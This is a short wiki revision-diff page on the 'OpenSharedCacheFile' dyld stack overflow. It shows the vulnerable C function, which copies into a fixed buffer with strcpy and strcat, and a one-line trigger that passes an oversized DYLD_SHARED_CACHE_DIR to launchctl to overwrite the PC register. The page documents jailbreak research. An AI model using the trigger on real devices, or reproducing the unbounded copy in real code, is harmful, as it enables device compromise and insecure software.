|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "OpenSharedCacheFile"
(→Triggering the vuln =) |
m (Grammar dude! Stub too.) |
||
| Line 1: | Line 1: | ||
| − | The OpenSharedCacheFile bug was found by i0n1c |
+ | The OpenSharedCacheFile bug was found by [[i0n1c]]. This bug is a simple stack overflow. |
== Opensharedcachefile() function == |
== Opensharedcachefile() function == |
||
int openSharedCacheFile() |
int openSharedCacheFile() |
||
| Line 16: | Line 16: | ||
DYLD_SHARED_REGION = private /bin/launchctl |
DYLD_SHARED_REGION = private /bin/launchctl |
||
This will overflow the PC register making it a stack overflow. |
This will overflow the PC register making it a stack overflow. |
||
| + | |||
| + | {{stub}} |
||
Revision as of 10:55, 23 March 2015
The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.
int openSharedCacheFile()
{
char path[1024];
strcpy(path, sSharedCacheDir);
strcat(path, "/");
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
return ::open(path, O_RDONLY);
}
Triggering the vuln
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = “A” * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl
This will overflow the PC register making it a stack overflow.
|
This article is a "stub", an incomplete page. Please add more content to this article and remove this tag. |
